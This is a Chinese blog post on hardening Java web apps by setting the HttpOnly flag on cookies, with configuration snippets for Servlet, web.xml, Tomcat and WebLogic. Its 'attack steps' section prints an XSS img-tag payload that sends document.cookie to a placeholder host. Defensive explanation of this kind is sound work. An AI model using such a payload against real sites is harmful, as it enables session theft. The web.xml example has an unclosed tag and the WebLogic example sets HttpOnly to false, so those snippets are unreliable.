漏洞解决方案-HttpOnly设置

最新推荐文章于 2024-05-17 01:48:00 发布
最新推荐文章于 2024-05-17 01:48:00 发布
阅读量7.5k 收藏 4
点赞数 5
分类专栏: 安全 文章标签: 安全漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/baidu_35488871/article/details/107927398
版权

漏洞解决方案-HttpOnly设置

漏洞解决方案-HttpOnly设置

漏洞概述

在Web安全领域,跨站脚本攻击时最为常见的一种攻击形式,也是长久以来的一个老大难问题,HTTP-only cookie是一种用以缓解跨站脚本攻击的技术,如果您在cookie中设置了HttpOnly属性,那么通过js脚本将无法读取到cookie信息,这样能有效的防止XSS盗取用户cookie。

攻击步骤
  1. 测试并发现一个存在XSS漏洞网站。
  2. 通过XSS漏洞,插入恶意链接:
 <img src= ‘http://xxxx/cookie.php?cookie='+encodeURIComponent(document.cookie)>
  1. 当其他用户访问相关页面时,恶意插入的代码被执行,用户的cookie信息被发送到恶意链接地址。
设置方法
  1. Servlet2.5及以下版本,不支持httpOnly,可通过response.addHeader或response.setHeader设置httponly。
    (1)response.addHeader
//设置cookie
response.addHeader("Set-Cookie", "uid=112; Path=/; HttpOnly");
//设置多个cookie
response.addHeader("Set-Cookie", "uid=112; Path=/; HttpOnly");
response.addHeader("Set-Cookie", "timeout=30; Path=/test; HttpOnly");
//设置https的cookie
response.addHeader("Set-Cookie", "uid=112; Path=/; Secure; HttpOnly");2)response.setHeader
response.setHeader("Set-Cookie","cookiename=value;Path=/;Domain=domainvalue;Max-Age=seconds;HTTPOnly");
  1. Servlet3.0提供SessionCookieConfig接口,用于操作会话Cookie,其中有setHttpOnly(boolean httpOnly) 设置是否支持HttpOnly属性。
cookie.setHttpOnly(true);
  1. 也可以在web.xml配置如下:
<session-config>
	<cookie-config>
		<http-only>true</http-only>
	</cookie-config>
<session-config>
  1. 对于tomcat6支持对JSESSIONID的cookie设置HttpOnly,
    具体的设置是在context.xml配置文件中进行设置的,为Context标签添加如下属性即可开启或禁止HttpOnly:
<Context useHttpOnly="true"/>
  1. 对于weblogic,可以在weblogic.xml里添加
<session-descriptor>
	<cookie-http-only>false</cookie-http-only>
</session-descriptor>

关注公众号,一起分享实用安全技术,关注安全最新事件,记录工作常见问题,吐槽生活真心操蛋。
在这里插入图片描述

rel~smart
关注
  • 5
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
xss解决方案.zip
03-13
- **使用HTTPOnly Cookie**:设置Cookie的HTTPOnly标志,防止JavaScript访问,从而降低Cookie被盗的风险。 - **使用Content Security Policy (CSP)**:CSP可以限制浏览器加载的资源类型,防止恶意脚本的执行。 - **...
HttpOnly的设置
willie_chen的专栏
08-02 2万+
描述: 1.会话cookie中缺少HttpOnly属性会导致攻击者可以通过程序(JS脚本、Applet等)获取到用户的cookie信息,造成用户cookie信息泄露,增加攻击者的跨站脚本攻击威胁。 2.HttpOnly是微软对cookie做的扩展,该值指定cookie是否可通过客户端脚本访问。Microsoft Internet Explorer 版本 6 Service Pack 1 和更高...
安全开发:Spring Boot 打开 HttpOnly 和 Secure 属性
回纹勾边宝相花团
06-08 1万+
应用上线,需要修复安全问题,需要为 Cookie 设置 “HttpOnly” 和 “Secure” 属性。 HttpOnly 设置方法 配置 默认值 说明 server.servlet.session.cookie.http-only true 是否对会话 cookie 使用 "HttpOnly"cookie。 默认 D:\learn\learn-java\spring-boot-high-concurrency>curl http://localhost:8080/stuff
JAVA Web应用常见漏洞与修复建议_基于dom的xss是将用户可控的javascript数据输出到html页面中而产生的漏洞,为了避
最新发布
2401_84969054的博客
05-17 444
自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。[外链图片转存中…(img-xRVOqBcz-1715881670315)]
超详细的cookie属性HttpOnly和SameSite引起的漏洞解决方案
dhklsl的专栏
08-19 1万+
解决漏扫cookie漏洞:Cookie No HttpOnly Flag和Cookie Without SameSite Attribute。设置cookie的httponly和samesite属性。
网站安全之设置HttpOnly的方法
owen_william的博客
03-26 1万+
1.  问题说明      如果我们为Cookie设置HttpOnly的属性,那么就可以防止系统有Cookie的信息泄露。比如,我们使用javascript:alert(document.cookie)的主语句就可以查看自己的Cookie的信息是还泄露了。自己的Cookie信息一但泄露了,就可能对系统的安全造成威胁了。 2.  解决办法 在Tomcat下的conf的web.xml加入如下信息
常用Web开发语言HttpOnly设置详解
mituan1234567的专栏
07-03 4665
http://www.2cto.com/kf/200905/38080.html by:Neeao Http://www.neeao.com 2009-05-11 ———————————– 关于HttpOnly对于防范XSS来获取 cookies信息的分析,请参考剑心同学写的:利用httponly提升应用程序安全性,这里仅把常用的一些Web开发语言的设置方法整理总结下,备
漏洞解决方案-跨站脚本攻击之HttpOnly设置
smart的博客
08-26 4604
漏洞解决方案-HttpOnly设置漏洞概述攻击步骤设置方法 漏洞概述 在Web安全领域,跨站脚本攻击时最为常见的一种攻击形式,也是长久以来的一个老大难问题,HTTP-only cookie是一种用以缓解跨站脚本攻击的技术,如果您在cookie中设置了HttpOnly属性,那么通过js脚本将无法读取到cookie信息,这样能有效的防止XSS盗取用户cookie。 攻击步骤 测试并发现一个存在XSS漏洞网站。 通过XSS漏洞,插入恶意链接:<img src=‘http://xxxx/cookie.php
常见WEB安全漏洞解决方案
07-27
本资料由IBM Rational Appscan提供,涵盖了常见的Web安全漏洞及其解决方案,旨在帮助开发者和安全专家识别并防范这些威胁。以下是其中的一些关键知识点: 1. **SQL注入**:攻击者通过在输入字段中插入恶意SQL代码,...
Web渗透测试-常见漏洞解析课件
03-23
解决方案是使用间接引用,确保只有授权用户能访问其自己的数据。 此外,课程中还会涉及命令注入、弱口令、不安全的认证机制、敏感信息泄漏等其他常见漏洞,并介绍相应的预防和修复措施。同时,我们也会分享一些常用...
jsessionid存在的问题及其解决方案
03-16
本文将深入探讨`jsessionid`存在的问题以及相应的解决方案,并结合提供的`DisableUrlSessionFilter.java`和`web.xml`文件来阐述如何在实际应用中处理这些问题。 首先,`jsessionid`是Java Servlet容器为了跟踪用户...
XSS跨站脚本攻击漏洞修复方法
06-18
4. **启用HTTPOnly cookies**: 配置服务器使cookies不可通过JavaScript访问,降低通过XSS窃取cookies的风险。 5. **使用SameSite属性**: 对cookies设置SameSite属性,限制第三方请求不能携带cookies,防止CSRF...
我如何设置一个http only的cookie
m0_57236802的博客
08-15 3153
设置一个HttpOnly的 cookie 意味着该 cookie 不能通过客户端脚本(如 JavaScript)进行访问。这是一个安全措施,通常用于减少某些类型的攻击,如跨站脚本攻击 (XSS)。以下是如何在不同的上下文中设置HttpOnly。
HttpOnly
翻过这座山,就到菩提洞了
03-27 721
1.什么是HttpOnly?   如果您在cookie中设置了HttpOnly属性,那么通过js脚本将无法读取到cookie信息,这样能有效的防止XSS攻击 具体一点的介绍请google进行搜索 2.javaEE的API是否支持?   目前sun公司还没有公布相关的API,但PHP、C#均有实现。搞javaEE的兄弟们比较郁闷了,别急下文有变通实现   3.HttpOnly的设置样例 ...
WEB攻防-XSS跨站&CSP策略&HttpOnly属性&Filter过滤器&标签闭合&事件触发
siu~
09-13 326
1、XSS跨站-安全防御-CSP策略 2、XSS跨站-安全防御-HttpOnly 3、XSS跨站-安全防御-XSSFilter
应用安全系列之二十:HTTP协议安全
jimmyleeee的专栏
03-18 1038
本系列文章主旨在于介绍一些漏洞类型产生的基本原理,探索最基础的解决问题的措施。 HTTP协议也提供了一些头用于提高安全,本章节主要是介绍一些常用的协议头和他们的作用,以及如何正确使用。 CORS HTTPonly Secure SameSite HSTS XSS-Protect X-Frame-Option Content-Security-Policy (CSP) 如果有不妥之处,希望可以留言指出。谢谢! 参考: https://cheatsheet...
Cookie中HttpOnly的使用方式以及用途
热门推荐
drawlessonsfrom的博客
12-22 2万+
一、HttpOnly的简介 HttpOnly是Cookie中一个属性,用于防止客户端脚本通过document.cookie属性访问Cookie,有助于保护Cookie不被跨站脚本攻击窃取或篡改。但是,HttpOnly的应用仍存在局限性,一些浏览器可以阻止客户端脚本对Cookie的读操作,但允许写操作;此外大多数浏览器仍允许通过XMLHTTP对象读取HTTP响应中的Set-Cookie头。 二、使用方式 语法 Set-Cookie: <cookie-name>=<cookie-value
Cookie没有HTTP Only标志漏洞
Min_Monk的博客
11-06 3984
会话cookie中缺少HttpOnly属性会导致攻击者可以通过程序(JS脚本、Applet等)获取到用户的cookie信息,造成用户cookie信息泄露,增加攻击者的跨站脚本攻击威胁。 HttpOnly是微软对cookie做的扩展,该值指定cookie是否可通过客户端脚本访问。Microsoft Internet Explorer 版本 6 Service Pack 1 和更高版本支持co...
Cookie属性HttpOnly引起的漏洞解决方案
Sveinn的博客
03-06 359
项目扫描的时候出一个漏洞,Cookie未配置HttpOnly标志。那HttpOnly是什么呢?Httponly是微软对cookie做的扩展。这个主要是解决用户的cookie可能被盗用的问题。在web应用中、JSESSIONID (Cookie)没有设置Httponly属性可能会窃取或操纵客户会话和 cookie,它们可能用于模仿合法用户,从而使黑客能够以该用户身份查看或变更用户记录以及执行事务。这里我是写一个拦截器,实现GlobalFilter,我们可以在拦截器中向Cookie中添加HttpOnly属性。
js-cookies如何设置httponly
07-15
要在使用js-cookies库设置httponly标志,您可以通过传递一个具有httponly属性的选项对象来完成。 下面是一个示例代码片段,演示如何使用js-cookies设置httponly: ```javascript import Cookies from 'js-cookie';...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值